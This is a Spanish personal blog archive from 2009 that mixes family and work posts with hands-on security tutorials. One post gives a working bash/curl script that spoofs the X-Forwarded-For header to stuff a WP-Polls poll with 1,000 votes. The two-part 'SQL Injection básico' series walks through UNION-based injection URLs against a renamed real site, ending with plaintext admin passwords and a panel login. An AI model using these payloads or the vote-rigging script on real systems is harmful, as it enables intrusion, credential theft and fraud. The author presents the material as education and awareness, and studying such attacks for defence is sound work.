jueves, diciembre 31, 2009
Se nos va el 2009... con todo ese 2010!
Como siempre he dicho, no llamemos "malo" a lo "malo" que nos paso, si de esa experiencia agridulce pudimos aprender algo, en ese momento dejo de ser malo... y en este anio he aprendido mucho, en lo laboral, en lo espiritual, en lo familiar... y definitivamente me gusta mucho aprender, espero que el 2010 me traiga mucho mas aun.
A todos ustedes, los que se toman el tiempo para visitarme en este rincon aunque no hable nada bueno, gracias y desde este rincon les deseo lo mejor, que Dios siga bendiciendo sus vidas y que este 2010 cumplan los propositos trazados y que Dios les de aun mucho mas de lo que esperaban!!!
Feliz 2010 a todos ustedes!!!
miércoles, diciembre 23, 2009
No mas niños quemados...
Se que muchas veces es difícil en nuestra propia familia decir "No vamos a comprar", siempre están los comentarios "Si el hermano mayor la va a quemar, si lo hará supervisado, si solo estrellitas o volcancitos serán... etc.", pero el caso es que de una u otra forma seguiríamos fomentando esta práctica indebida... mi opinión es que se la dejemos a quienes han tomado las medidas de seguridad necesarias para su manipulación.
En lo personal, este año me tocó decir también "no", no quiero que mi hijo crezca viendo como algo "normal" la quema de pólvora en casas, posiblemente los primeros años no lo entienda y hasta llegue a "caer mal", pero estoy seguro que mas adelante, cuando tenga la edad necesaria lo entenderá, no importa si esa edad sea hasta cuando sea tambié padre de familia y esté velando por la seguridad de los suyos.
Este año vuelvo a decir "No mas niños quemados, yo no compro pólvora".
Saludos y felices fiestas a todos!
jueves, diciembre 10, 2009
Al fin mis vacaciones...
Estaba decidiendo a donde ir cuando mi esposa me dice que en una tal playa "Las Flores" acababan de decir en la tele que daban clases de surf... no me dijo dos veces ya estaba buscando información en internet, encontré que esta playa está en San Miguel y justamente encontré dos hoteles que se miraban bonitos:
http://www.lasfloresresort.com/
http://www.elhotelmiraflores.com/
Ambos tenían la opción de clases de surf... por el precio me decidí por el segundo y dado que siempre he querido aprender a surfear pues todo salía perfecto, ojalá algún día pueda ir también al segundo que se mira de lujo!
Vacaciones inolvidables... el hotel con un excelente servicio, mucho mejor de lo que esperaba, el lugar excelente, justamente me quedé en el hotel que mejor vista tiene por estar en alto, la vista es impresionante. En la playa conocí a varias personas muy amables y ellos mismos fueron quienes se ofrecieron a enseñarme a surfear, muchisimo mas barato que tomar clases directamente en estos hoteles, así que ellos mismos consiguieron la tabla y me puse a hacer mis pininos sobre las olas... ufff.. cansadísimo, pero estuvo excelente... espero poder volver a ir en estas vacaciones de fin de año aunque ya en version "mochilero" para no gastar tanto y poder practicar un poco mas. Esta playa es especial para comenzar a aprender, olas no tan fuertes pero lo suficiente como para ir agarrando práctica. Para los mas experimentados existe "Punta Mango" que es otra playa que tiene buena fama entre los surfistas, aunque por la cantidad de piedras que hay, la recomiendan para surfistas mas experimentados... asi que, en otra ocasión será!
Desde este rincón un saludo a toda la gente de El Cuco y playa las Flores por su amabilidad y hospitalidad (Toda esta gente te trata como si ya te conocieran!), saludos a Edwin, Goofy y Yepi por sus clases y consejos y por iniciarme en este excelente deporte: El Surf!
Recomendaciones y revisiones finales:
Ambos hoteles están excelentes, La Flores Resort es mas de lujo, pero con un ambiente excelente, el Miraflores está mas accesible aunque no tiene nada que envidiar, cuartos con aire acondicionado, cable, etc.
Si vas en versión mochilero, encontrarás cuartos solo con ventilador desde $15 a $25 la noche... si es temporada alta y todo está lleno, siempre encontrás lugares que te alquilen un espacio para poner tu tienda de campaña.
Saludos!
jueves, noviembre 26, 2009
Apple y yo...
Muchas cosas han pasado ultimamente con mi vida... esta es una de ellas...
Si algo no podemos negar es la increible creatividad y diseño que ha caracterizado a Apple y sus macs.
Allá por el año 1996 tuve mi encuentro cercano con una Mac. Mauricio era quien en ese entonces tenía su negocito y varias computadoras (todas mac) en las cuales jugabamos en red Quake, Descent, Nascar, Carmagedon...
Fue con el que pusimos lo que para mi sería mi primer negocio, gracias a el comencé en esto del diseño gráfico, todo a pura mac, en ese entonces era una de 266 mhz trabajando photoshop, se defendía mejor que las 533mhz intel de ese entonces, claro, mac se jactaba de ser 2 veces mas rapido que una intel, y realmente... lo era, claro eran mucho mas caras ya que también utilizaban la tecnología SCSI, era un hardware realmente potente.
Imac graphite 400
Ese había sido mi ultimo encuentro con apple... hasta que salió el iphone, tenía que tener uno... al ver lo hermosos que son y la cantidad de aplicaciones que habían, tenía que tener uno, pero algo que también ha caracterizado a Apple ha sido su elevado precio, muy alejado de mis posibilidades, sin embargo Regino tuvo a bien cambiarme su iphone por me Treo 750... y al fin tenía mi iphone, mac me volvía a tocar.
El iphone, sus aplicaciones y su mercado hicieron que se me metiera que quería aprender a programar para él (había que rebuscarse para ver de donde podía obtener ingresos por todo el ambiente que esta pasando la empresa para la que -aun- laboro), lamentablemente el SDK solo corre en mac, asi que después de hacer pruebas con maquinas virtuales y versiones MacOS para intel que corrían pero demasiado lentas... tenía que comprarme una mac para poder lograr este objetivo.
En octubre nos indemnizarona todos en la empresa así que, de nuevo, previendo lo que espero hacer con las aplicaciones iphones, necesitando una computadora para diseño 3D, animaciones y video, he vuelto a ser macintouched -touched by macintosh ;-)- me compré una Imac de las nuevas versiones, siguen siendo de un diseño increible, irónicamente ahora tienen procesador Intel (recordemos el video...), pero aún así, el hardware tiene un excelente desempeño, superior a una pc normal. Si, se que por el precio que pagué podía tener una PC con mejor capacidad, pero, necesitaba una combinación entre el ambiente para el SDK de iphone y capacidad de hardware, asi que fue la combinación perfecta.
El bootcamp de mac hace facil la tarea de montarle gnu/linux... Claro, ya está en proceso de su liberación siendo "Debianizada"... siempre quise esa combinación: Hardware mac y mi querido Debian.
Aun estoy peleando con algunos detalles para poder exprimir cada detalle, me falta tiempo para poder dejar mi Debian "de toque" pero ahi vamos, la "manzana" ahora forma parte de mi laboratorio.
Lamentablemente... no todo fue color de rosa... estoy bastante molesto con la gente de la macstore galerias (macstore4), pero muy agradecido con la gente del taller tecnico... pero, ese es otro post.
Saludos!
viernes, octubre 16, 2009
Tristeza... un capitulo mas está por cerrarse...
La hora cero se acerca para la empresa para la cual he laborado por los últimos 6 años de mi vida, a estas alturas del juego aún no tenemos la certeza si la empresa continúa o no.... menos aún si yo continúo o no, lo cierto es que esta bodega de 42,000 pies cuadrados ya se ve casi vacía en su totalidad, el movimiento que queda es poco así que esta semana me ha tocado hablar con las primeras personas que se estarán recortando y llegan trabajando con nosotros hasta este día... no porque sean malos trabajadores, muy al contrario, son excelentes trabajadores, sin embargo había que hacerlo y eso es lo mas duro, no hay razón mas que... había que hacerlo.
Es grato saber que como jefatura no he fallado, como compañero de trabajo no he fallado, como empleado no he fallado, es grato escuchar que el ambiente de trabajo que tenemos/tuvimos es envidiable, pero duele escuchar a las personas "yo quisiera seguir trabajando aca, por favor, tomeme en cuenta" cuando ni siquiera yo mismo tengo nada seguro...
Ya comencé desde hace un tiempo a repartir curriculums, aún no hay nada... es un pésimo tiempo para repartir curriculums (crisis + fin de año), mas sin embargo tengo la certeza de que Dios tiene algo y que no me dejará, pero este tiempo no deja de ser duro... mas por la gente con la que trabajo, mis compañeros de trabajo, que por mi.
A estas horas suena la pelota de ping-pong en la cafetería, pelota con la que tantas veces nos hemos divertido... y hoy tiene un futuro incierto.
Ha sido una semana dura, pero la vida continúa, esto, como todo, es parte del trabajo... hoy, por todos los que trabajamos aca, tengo que salir y a pesar de esta tristeza, poner buena cara para lograr levantar el ánimo de todos... hoy tengo que ser fuerte... hoy salgo y voy a jugar, una vez mas, con rostro alegre, ping-pong.
sábado, octubre 10, 2009
Votando mas de lo permitido con WP-Polls
WP-Polls es un plugin de WordPress para administrar encuestas, nunca lo he utilizado, simplemente quiero apuntar a lo fácil que es saltarnos la seguridad que tiene de no permitirnos votar mas de una vez por IP, pudiendo votar fácilmente las veces que se deseen, por lo que este plugin no debería ser utilizado para encuestas que se desean tener datos reales ni mucho menos para concursos...
Según pude ver, gracias al plugin x-forwarded-for spoofer para firefox, al cambiar el valor de la cabecera http x-forwarded-for, me permitía votar de nuevo... de que estoy hablando? bueno, pueden encontrar mas información sobre esta cabecera http en wikipedia, en resumen diremos que esta cabecera lleva tu ip local, por ejemplo, varios de los proveedores locales de internet hacen que varias personas salgan a internet a través de una misma IP, por ejemplo, por una misma IP está accediendo el Sr. Perez a la página de su periódico favorito pero tambien está Maloso Juarez queriendo entrar por fuerza bruta a la página de administración del mismo periódico... los administradores del servidor del periódico andaban vivos y se dieron cuenta del ataque de Maloso Juares, así que deciden bloquear la IP publica de Maloso Juarez, que resulta ser también la del Sr. Perez, resultando en que el Sr. Perez no puede disfrutar de su lectura porque fue bloqueado "sin querer".
X-forwarded-for entonces no toma en cuenta la IP publica, sino la IP local... ejemplo, la IP publica del Sr. Perez y Maloso Juarez era 200.13.X.X, pero la ip local que les está asignando el router de cada casa es del tipo: 192.168.0.1, que es la IP que lleva la cabecera X-Forwarded-for.
Esto solo fue un ejemplo, claro en la vida real si estoy sufriendo un ataque bloqueo la IP, no importa quien mas quede afectado, solo quise ilustrar la diferencia de IPs.
Volviendo al X-forwarded-for, al ser una cabecera HTTP enviada por el cliente (nosotros), tenemos control completo sobre que enviar y que no, ya sea con el plugin mencionado anteriormente, algún proxy... o a pie.
Ya que descubrimos que WP-Polls unicamente verifica la dirección que viene detallada en la cabecera x-forwarded-for, entonces podemos engañarlo (IP spoofing), nos podemos entonces hacer un pequeño script bash, tenemos pues que verificar primero que variables son las que enviamos por post, para el caso WP-Polls normalmente son las siguientes:
vote=true&poll_id=1&poll_2=2&rndval=12321321321323
Bastará con identificar los valores para la opción que necesitamos, y nos hacemos nuestro script bash haciendo uso de curl,
... antes de ponerlo, hay que aclarar que en x-forwarded-for podemos poner cualquier numero y dara igual... es decir, bien puedo poner rangos reales de IP: 192.168.0.1-254, IP inventadas: 955.278.8000.6... o numero cualquiera.
ahora si.. el script:
-----------------------------
#!/bin/bash
NUM=0
#solo vamos a agregar 1,000 votos
while [ $NUM -le 1000 ]; do
#generamos un numero random para ponerlo como parte de nuestra IP
RAN=$RANDOM
# $1 indica un argumento pasado desde la linea de comandos (ver uso despues)
# $RAN es nuestro numero random generado anteriormente
# $NUM es el numero correlativo de nuestra votacion
# -H es utilizado por curl para enviar cabeceras HTTP
# -d es utilizado por curl para indicarle las variables que tiene que enviar por POST
# ademas crea un archivo con la respuesta obtenida (para saber si el voto fue efectivo)
# lo cual puede omitirse si no quieres ver un monton de archivos..
#
# Nuestra IP la forma con el argumento que le pasemos,
# el numero random y el numero correlativo
# ej. si le pasamos el argumento "200.13"
# le agrega un numero random quedando "200.13.454545"
# y luego le agrega el correlativo quedando "200.13.454545.1"
# lo que hara algo dificil que se repita ;)
curl -H "X-Forwarded-For: $1.$RAN.$NUM" -d "vote=true&poll_id=1&poll_2=2&rndval=$RAN" "http://sitio_con_WP-Poll/" >log_$1.$RAN.$NUM.html
let NUM=$NUM+1
done
-----------------------------
Lo guardamos con cualquier nombre, por ej "wp", y lo ejecutamos pasandole un argumento para hacer aun mas flexible nuestra IP...
wp "200.13"
Y ahi va nuestra votacion...
Cabe mencionar que no he verificado versiones ni mayor detalles de este plugin...
Saludos!
jueves, octubre 08, 2009
Inyectando sitios SV y el nacimiento de la Jeringa
Realmente fue algo interesante, como mencionaba anteriormente, todo fue como comenzar a jalar ese hilito de la camisa y al final se desarma todo, resultó ser que un gran número de sitios de El Salvador -y otros paises- estaban hechos por la misma empresa. Tuve la oportunidad de ir y hacerles una demo de su problema, como dato interesante me di cuenta que esta empresa ocupa en su gran mayoría software libre y son "suseros", estuvimos hablando un buen rato, al final se implementó una solución con otro software libre (https://phpids.org/) que da muy buenos resultados, me invitaron a probarlo (incluso en su página tienen una parte para que pruebes tus inyecciones y xss) y después de leer un rato al respecto y ver que algunos de los mejores han colaborado para detectar y agregar vectores de ataque, definitivamente me di cuenta que es una buena solución, aunque como decía alguien en un comentario sobre este soft:
Esto estara bien para el tema de cuando quieres programar rapido y tal, pero si es algo serio o es alguna programacion a medida es un poco cutre estar usando estas cosas, das a parecer que no eres capaz de programar seguro. Pero de todas formas esta bastante bien para principiantes o gente que sepa muy poco.En esa visita también estuvimos hablando de lo triste que es que muchas empresas y gente con posibilidades económicas no tengan el mas mínimo interés en invertir en asegurar sus sitios.
Basta darse una vuelta por zone-h para darse cuenta la cantidad de sitios salvadoreños que han sido víctimas de defaces y lo mas triste es ver que al parecer solo vuelven a levantar el sitio y la vulnerabilidad sigue ahi... tal es el caso de algunas televisoras que ni siquiera tiene información para contactarles.
Todo esto también ha llevado al nacimiento de la "jeringa", una herramienta que claro está, sirve para "inyectar", la estoy programando en perl y ocupa un par de comandos de linux, hasta el momento solo es aplicable a MySQL, detectando si es o no vulnerable a inyecciones, saca el nombre de la BD y la cantidad de tablas que tiene. Realmente no es nada del otro mundo, solo mi diversión para programar un poco, pero lo mas gracioso es que ha sido capaz de detectar y obtener información de algunos sitios que sqlmap no ha detectado.
Si, se que aún estoy pendiente con el manualito de inyecciones a ciegas, pero el trabajo ha estado pesado ultimamente, quien quita y luego publique el manual junto a la herramienta ;)
Termino con algo que he tenido en mente desde que comenzaron todos estos acontecimientos... Que necesita la gente para tomar conciencia de la seguridad? claro esta que no solo hace falta que les pasen las cosas.... tampoco son recursos..... será que tenemos que ir sitio por sitio como zerial e irles avisando a cada uno?
Saludos!!!
lunes, septiembre 21, 2009
31 y contando...
Asi, son 31 primaveras, 31 años de estar respirando, 31 años de haber emprendido esta carrera que se llama "vida", ayer cumplí 31 años.
Desde mi rincón quiero agradecerle primeramente a mi padre celestial por permitirme llegar hasta este momento, definitivamente que sin él no estaría acá ni sería lo que soy.
Es interesante, siempre en fechas de este tipo uno se pone "algo" reflexivo, ayer, aunque intenté no hacerlo, mi mente se resistió a obedecer, aunque no fue mucho, logré recordar hace un par de años atrás en los que me vi estancado en conocimientos y pensé "Ok, hasta aquí llegue, mi curva de aprendizaje está decreciendo exponencialmente"... y me resigné, sin embargo debo decir que este último año ha sido muy bueno, a pesar del poco tiempo disponible para mi auto-aprendizaje, logré aprender un poco mas sobre otros temas que había dejado iniciados y de nuevo logré sentir esa chispa que tienes como cuando se te viene una idea y comienzas a programar y programar y programar y ves ese montón de líneas de código que sin darte cuenta has escrito y la racha sigue, no quieres parar, tan solo quieres seguir aprendiendo, agregando mas líneas, rutinas, etc... esa sensación es única.
Dios me ha dado un año mas y estoy mas que agradecido por eso. Dios me ha dado una bella esposa y 2 hermosos hijos con quien comparto mis días, unos amigos que, aunque no son muchos, se que cuento con ellos, una comunidad de la cual me siento parte... definitivamente son mas cosas de las que pudiera pedir!
Ayer, disfruté el día y pude ver a varios amigos (aunque no se acordaron del día en si, los muy desgraciados), pude compartir aunque sea unos momentos y eso es lo importante, luego salí a Ataco con mi familia (me encanta ese pueblo!), regresé y logré ver a mis padres aunque sea un ratito. Algunos mensajes, llamadas y felicitaciones por chat e irc, un debian-wine que rmayorga me había traído del último debconf para disfrutar mientras con mi esposa veíamos una película... que mas podría querer?
Saludos y gracias a todos por estar ahi: a los que solo me leen de vez en cuando, a los que se toman la molestia de venir cada vez que pongo algo nuevo, a los que solo les interesan los post tecnicos, a los que también leen sobre mi vida, en fin... a vos que lees este post!
lunes, septiembre 07, 2009
Muy pronto... Blind SQL Injection
Lo interesante del asunto es que todos los sitios son autoadministrables, usan un CMS creado por ellos, sin embargo los sitios recientes ya habían sido hechos bajo una nueva versión del CMS y, curiosamente ya no presentaba errores de sintaxis al ponerle una comilla por ahi... pero eso no quiere decir que no fueran vulnerables, así que el viernes por la noche comencé la tarea, facilmente se pudo ver que eran vulnerables a Blind SQL Injection, así que al llegar a la casa me puse manos a la obra y pude comenzar a sacar la información, pero al ser a ciegas, el proceso es algo tedioso una vez se ha encontrado la forma correcta de obtener la información... comencé por los ultimos sitios creados por ellos, pude ver que en efecto al menos los 4 sitios que tomé de base, eran vulnerables, así que, curiosamente me había olvidado y había dejado de último el análisis de la pagina de los desarrolladores... me busque una herramienta para automatizar el proceso, así que dejé trabajando mi maquinita todo el sábado mientras dormía, domingo a primera hora ya tenía toda la información requerida... por lo que me dispuse a dar el respectivo aviso a los desarrolladores.
Esto, además de la primera y segunda entrega sobre inyecciones SQL, prepara el camino para hablar un poco sobre Blind SQL Injection, un dia de estos por la noche veré si hacemos el taller respectivo en IRC para luego hacer un manualito, así que espero pronto dejar el post sobre el tema.
Saludos!
jueves, agosto 20, 2009
Quiero ir a la "lomita"
A continuación, para el que quiera leerlo copio la parte de donde saco el término:
"¿Qué es lo que hago aquí? De repente, me pregunto para qué he venido. Después de la reunión, que, por cierto, durará casi todo el día, ¿voy a poder hacer mi fábrica más competitiva, salvar un empleo o ayudar a alguien a hacer algo que pueda resultar provechoso?.. . Es inútil. No sé ni siquiera lo que es la productividad. Estoy perdiendo el tiempo. Con estos pensamientos en la cabeza, voy recogiendo lentamente y... me largo.
Nadie se dirige a mí en el tramo que separa la sala de los ascensores, así que, afortunadamente, mi escapada pasa inadvertida. Pasa inadvertida hasta que, esperando el ascensor, se me acerca Hilton Smyth.
— No estarás intentando abandonar el barco, ¿verdad Al? Por unos instantes pienso en ni siquiera mirarle, pero me doy
cuenta de que Smyth va a ir con el cuento a Peach, así que improviso:
— Tengo que hacerlo. Hay un asunto urgente que debo resolver en la fábrica.
— ¿Cómo? ¿Una emergencia?
— Más o menos.
Las puertas del ascensor se abren. Subo. Smyth sigue su camino con una expresión curiosa en sus ojos. Las puertas se cierran.
Peach bien podría despedirme por abandonar su reunión. Tal y como están las cosas, no sería sorprendente. Bueno, si me despidiera me ahorraría los tres meses de angustia que quedan para que ocurra lo inevitable. Tengo el ánimo por los suelos.
Al llegar a Bearington no voy a la fábrica. Deambulo por las calles, girando el volante cuando me parece. Pasan dos horas. No
me importa. Quiero escapar. No pienso en el trabajo. Trato de olvidarlo, pensando en el buen día que ha quedado. Brilla el sol. Hace buena temperatura. No hay nubes. El cielo es azul y, aunque la primavera no ha llegado todavía, ya anuncia que está cercano su milagroso estallido de cada año. ¡Es un buen día para evadirse!
Recuerdo haber mirado la hora poco antes de llegar a la verja de entrada de la fábrica, la una. De repente, cuando estoy a punto de traspasar la verja, caigo en la cuenta de que no quiero entrar. Miro a la fábrica y acelero, dándole la espalda. Tengo hambre. Voy a buscar algo para comer. Me doy cuenta de que lo que realmente no quiero es entrar otra vez en la dinámica del trabajo. Necesito pensar tranquilamente.
Un par de kilómetros más arriba hay una pizzería. Está abierta. Entro y pido una pizza de tamaño medio con doble de queso, pepinos, salchichas, champiñones, pimienta, mostaza, aceitunas, cebolla y —¡hummm!— ¡trocitos de anchoa! Mientras espero, se me van los ojos detrás de las patatas fritas, los taquitos de jamón, las aceitunas... Le digo al encargado, un siciliano, que me prepare dos bolsas para llevar. Normalmente, no bebo a mediodía, pero el anuncio luminoso —«LLÉVAME»— de las cervezas me hace desearla y pido seis latas frías. Pago y salgo con tan preciado cargamento. ¡La angustia me abre un apetito voraz!
Cerca de la fábrica hay un camino de gravilla que asciende por una pequeña pendiente, hasta llegar a la subestación eléctrica que está a un kilómetro, más o menos. Giro bruscamente para entrar en el camino. El Buick derrapa un poco. Tiendo la mano rápidamente para evitar que la pizza salte del asiento.
Aparco, dejando tras de mí una nube de polvo. Me quito la corbata y la americana para que no se manchen. Desabrocho los dos botones superiores de mi camisa y empiezo a dar cuenta de las provisiones. Es un auténtico placer morder la masa crujiente. El queso se estira entre mi boca y la pizza, en hilos amarillos y elásticos.
La fábrica está ahí. La veo desde mi atalaya, al otro lado de la carretera. Es como una caja de metal gris sobre la explanada. Ni una sola ventana. Sé que dentro hay cuatrocientas personas trabajando en el turno de día. Sus coches están aparcados delante de la
fábrica. Observo que un camión está reculando entre otros dos, en la plataforma de embarque. Los tres transportan materiales. Los materiales que las máquinas y los hombres de dentro están utilizando para hacer cosas. Al otro extremo, otros camiones se llevan lo que se ha producido. Se supone que yo dirijo lo que ocurre allí abajo. Abro una cerveza y mastico mi pizza antes de beber un trago.
La fábrica parece un elemento más del paisaje. Es como si fuera consustancial al paisaje mismo. Sin embargo, sé que lleva allí sólo quince años y, es más, sé que es muy probable que no sobreviva los próximos quince. ¿Cuál es la meta? ¿Qué se supone que hacemos ahí? ¿Qué es lo que está manteniendo en marcha todo el montaje?
Jonah afirmaba que hay una sola meta."
Definitivamente... a veces quisiera dar media vuelta e irme a esa "lomita" para darme un break y alejarme del ambiente de trabajo, pero el mismo sentido de responsabilidad no me deja hacerlo tanto así, ya llegará el día, pero... quiero ir a la lomita.
jueves, agosto 13, 2009
SQL Injection básico II/II
Ok, no vamos a decir el nombre ;) asi que a nuestro sitio le llamaremos "lazyprogrammer.com.sv", vamos a por lo que vinimos:
¿Que información es básica para nuestros propósitos?
Dada la cantidad de variables, sintaxis y escenarios con los que nos podemos encontrar las cosas que necesitamos saber, entre otras son:
- Tipo de servidor de bases de datos (Oracle, MSSQL, MySQL, etc)
- Version del servidor de base de datos (por aquello de las sintaxis, cambios y vulnerabilidades)
- Nombre de la base de datos
- Nombre del usuario de la base de datos
- Permisos del usuario de la base de datos
- Nombre de la tabla
- Nombre de las columnas
- etc
Anteriormente vimos como una comilla simple se convertía en un gran enemigo de nuestro servidor de bases de datos y un aliado en las SQL injections, así que seguiremos usándola, luego verán que se vuelve una manía estar probando las comillas por donde vayamos.
Lo primero entonces es buscar una variable que sea inyectable, lo mas común es encontrarlas en variables que se pasan por la url del tipo:
http://www.lazyprogrammer.com.sv/faq_details.php?id=1
Aca se está pasando la variable id con valor 1 por la url... tomando de base lo que pasaba en la entrega anterior, veamos que pasa si ponemos una comilla simple al final como queriendo cerrar la consulta:
http://www.lazyprogrammer.com.sv/faq_details.php?id=1'
Nos da el siguiente error:
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Los errores son una gran fuente de información, acá por ejemplo, este error nos está diciendo lo siguiente:
- Estamos frente a un servidor MySql
- Las comillas simples se están "escapando", es posible que magic_quotes este "on"
Aquí es donde comenzamos a pedirle al servidor que nos diga mas, haciendo uso de subqueries o subconsultas "UNION SELECT", pero tenemos que tener en cuenta que cuando usamos Union Select, nuestra subconsulta debe de tener el mismo número de columnas que la primera consulta, entonces, se nos hace necesario primero saber cuantas columnas tiene la consulta original, probemos...
http://www.lazyprogrammer.com.sv/faq_details.php?id=1 UNION SELECT 1
Nos da el error:
The used SELECT statements have a different number of columns
Ok, tiene mas de una columna y además encontramos una variable que es inyectable... sigamos probando entonces hasta que no nos de ningun error
http://www.lazyprogrammer.com.sv/faq_details.php?id=1 UNION SELECT 1,1
http://www.lazyprogrammer.com.sv/faq_details.php?id=1 UNION SELECT 1,1,1
http://www.lazyprogrammer.com.sv/faq_details.php?id=1 UNION SELECT 1,1,1,1
Excelente, no nos dió error, nos mostrá la página como normalmente, esto quiere decir que tiene 4 columnas.
Otra forma de saberlo es haciendo uso de ORDER BY, veamos:
http://www.lazyprogrammer.com.sv/faq_details.php?id=1 ORDER BY 1
No dió ningún error... asi que probamos
http://www.lazyprogrammer.com.sv/faq_details.php?id=1 ORDER BY 2
Y así sucesivamente hasta que nos de el siguiente error:
Unknown column '5' in 'order clause'
Asi que tenemos 5-1 columnas = 4.
Ahora que sabemos que nuestra consulta debe de tener 4 columnas, debemos encontrar un lugar donde los resultados de nuestra consulta sean mostrados, asi que lo primero es hacer que la primer consulta no muestre ningún resultado, como lo logramos? tenemos que colocar un valor de registro (id) que no exista, de esa forma dejara el espacio en blanco, asi que podemos utilizar por ejemplo:
id=9999999999999
id=0
id=-1
Yo prefiero usar el -1, ahora... como sabemos que columna muestra y a donde la muestra? usamos lo siguiente:
http://www.lazyprogrammer.com.sv/faq_details.php?id=-1 UNION SELECT 1,2,3,4
Y nos muestra:
Tema:
2
3
Vemos que solo muestra 2 y 3... cambiemos algo mas para comprenderlo mejor:
http://www.lazyprogrammer.com.sv/faq_details.php?id=-1 UNION SELECT 1,2222,3333,4
y esto nos muestra:
Tema:
2222
3333
O sea que muestra en pantalla lo que solicitemos en las columnas 2 y 3.
Que podemos solicitar?
En el siguiente enlace tenemos una excelente hoja de cosas que podemos solicitar...
http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/
Entre estos encontramos:
@@version o version()
user()
system_user()
database()
Creo que es bastante obvio, asi que los comenzamos a probar, sustituyendo las columnas 2 y 3 por lo que querramos saber:
http://www.lazyprogrammer.com.sv/faq_details.php?id=-1 union select 1,database(),version(),4
O podemos unir toda la informacion que queremos para que lo muestre en un solo campo:
http://www.lazyprogrammer.com.sv/faq_details.php?id=-1 union select 1,concat_ws(char(58),version(),user(),database()),3,4
Esto lo que hace es concatenar los valores de version(), user() y database() haciendo uso del simbolo char(58) que son los dos puntos ":", entonces tenemos lo siguiente:
4.0.18:lazy_banner@lazyprogrammer.com.sv:lazy
O sea, la version de Mysql es 4.0.18, el usuario es lazy_banner@lazyprogrammer.com.sv y la base de datos se llama lazy.
La versión 4 de mysql es un poco mas tediosa para poder encontrar el nombre de las tablas y columnas, en la versión 5 podrímos hacer uso de information_schema.tables, pero en la 4 no la tenemos, asi que jugaremos un poco con nuestra creatividad y la poca creatividad del programador...
Averiguemos primero el nombre de la tabla... que nombres podría haber puesto el administrador para una tabla de login?
usuarios
users
login
logins
adminsitradores
administrador
admin
Probemos...
http://www.lazyprogrammer.com.sv/faq_details.php?id=-1 union select 1,2222,3333,4 from administrador
Table 'lazy.administrador' doesn't exist
No existe... seguimos probando hasta que...
http://www.lazyprogrammer.com.sv/faq_details.php?id=-1 union select 1,2222,3333,4 from admin
No da error, esto quiere decir que la tabla admin SI existe!!!
Y que columnas podrian existir?
user
usuarios
usuario
nombre
y tambien...
clave
password
Probemos....
http://www.lazyprogrammer.com.sv/faq_details.php?id=-1 union select 1,user,3333,4 from admin
Unknown column 'user' in 'field list'
No existe, asi que seguimos probando...
http://www.lazyprogrammer.com.sv/faq_details.php?id=-1 union select 1,usuario,password,4 from admin
Hasta que dimos con los nombres de las columnas correctas y mejor aun.. nos muestra el primer registro de esta tabla, dejando al descubierto el nombre del primer usuario y su password, la cual no esta encriptada sino en texto plano!!!
Aca solo nos mostró el primer registro, asi que busquemos mas, para esto utilizamos LIMIT
http://www.lazyprogrammer.com.sv//faq_details.php?id=-1 union select 1,usuario,password,4 from admin limit 0,1
Entonces seguimos con
limit 1,1
limit 2,1
limit 3,1
limit 4,1
Hasta que ya no muestra nada mas.
Ahora bien.... ya tenemos un listado de usuarios y passwords, los cuales se utilizan normalmente en algun formulario de Login, el cual... normalmente se encuentra en directorios como:
http://www.lazyprogrammer.com.sv/administrator
http://www.lazyprogrammer.com.sv/administrador
http://www.lazyprogrammer.com.sv/admin
Y voilaaaaa!!! /admin si nos muestra la pagina para loguearnos, asi que solo bastará utilizar cualquier combinación encontrada anteriorment y estamos adentro!!!
Bueno, hasta acá nos encontramos con un sitio bastante intuitivo, veremos si mas adelante preparamos algún otro texto para seguir ahondando en el tema, que como les dije antes, es bastante extenso.
Ya saben... preguntas, quejas, chascarríos.. a los comentarios!
SQL Injection básico I/II
domingo, agosto 02, 2009
SQL Injection básico I/II
SQL Injection es una vulnerabilidad bastante común que consiste en hacer que una aplicación que ejecuta una sentencia SQL, ejecute otra sentencia SQL que nosotros queramos, esto se logra “inyectando” un código para así modificar la sentencia SQL original.
¿Cual es el alcance/riesgo de este tipo de vulnerabilidad?
Todo dependerá del escenario (motor de base de datos, versión del motor de la base de datos, sistema operativo, permisos, lenguaje de programación, etc), pero entre las cosas que se pueden lograr están:
- Saltarse sistemas de autenticación (login bypass)
- Averiguar contraseñas u otra información, ya sea almacenada en la base de datos o en algún archivo.
- Agregar, eliminar, editar registros en una base de datos.
- Agregar, eliminar, editar tablas.
- Leer archivos (por ejemplo /etc/passwd), lo cual comprometería por completo un sistema...
- etc.
¿Por qué se da esta vulnerabilidad?
Debido a un mal trato de la aplicación a las variables que recibe, es decir, no se verifica el tipo de datos que esta recibiendo antes de utilizarlo, un error humano bastante común en muchos programadores que no tienen en cuenta la seguridad, en los ejemplos veremos mejor a qué nos referimos.
¿A quienes afecta?
Este tipo de vulnerabilidad se da en cualquier motor de base de datos que ejecute sentencias SQL (MySQL, MS SQL, Oracle, PostgreSQLetc), lo más común es encontrarla en aplicaciones web, aunque también existen otros tipos de inyecciones como: LDAP, XML, XPATH, etc.
El tema SQL Injection es un tema muy extenso e interesante, en este manual únicamente haremos una breve demostración de 2 cosas que se pueden hacer en aplicaciones web: En la primera parte utilizaremos SQL injection para saltarnos un sistema de registro (login bypass) y en la segunda parte veremos un caso real en el cual, haciendo uso de esta vulnerabilidad logramos acceso al panel de administración de un sitio.
Que conste que no soy experto en el tema, tan solo un aficionado que quiere compartir un poco sobre esto...
Introducción
¿Cómo podemos verificar si una aplicación web es vulnerable a SQL Injection? Lo primero que podemos probar es hacer que la base de datos nos genere algún tipo de error, el cual podríamos verificar para obtener mas información, para esto (y para otras cosas que veremos mas adelante) hacemos uso de la comilla simple (') o las comillas dobles (“), por ejemplo, es muy común encontrar sitios webs que en la url muestran algo asi:
http://www.sitiovulnerable.com.sv/faq_details.php?id=1
entonces, simplemente ponemos una comilla simple al final y nos queda:
http://www.sitiovulnerable.com.sv/faq_details.php?id=1'
Lo que nos podría generar el siguiente error:
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Este error nos dice que la comilla simple esta siendo “escapada” (se le está colocando un backslash antes de la comilla, osea.. la esta “escapando”), al ver que el lenguaje es PHP sabemos que esto se puede lograr, entre otras formas, usando la función addslashes() o teniendo magic_quotes_gpc() activadas en php.ini y además que se trata de un servidor MySQL.
En aplicaciones web las variables se pueden pasar haciendo uso del método GET (pasando variables por la URL como en el ejemplo anterior) o el método POST (haciendo uso de formularios), en ambos casos podemos encontrar este tipo de vulnerabilidad.
